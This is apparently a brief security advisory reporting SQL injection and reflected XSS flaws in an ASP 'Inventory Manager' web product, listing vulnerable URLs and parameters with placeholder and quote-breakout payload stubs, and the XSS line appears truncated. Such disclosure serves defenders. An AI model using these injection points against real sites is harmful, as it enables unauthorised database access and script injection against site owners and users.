vendor site:http://www.websitedesignsforless.com/ product:Inventory Manager bug:injection sql & xss (get) risk:medium injection sql : http://site.com/inventory/inventory/display/imager.asp?pictable='[sql] http://site.com/inventory/inventory/display/imager.asp?pictable=[inventory]&picfield=[sql] http://site.com/inventory/inventory/display/imager.asp?pictable=[inventory]&picfield=photo&where='[sql] xss get : http://site.com/inventory/inventory/display/display_results.asp?category='"> laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: saps.audit@gmail.com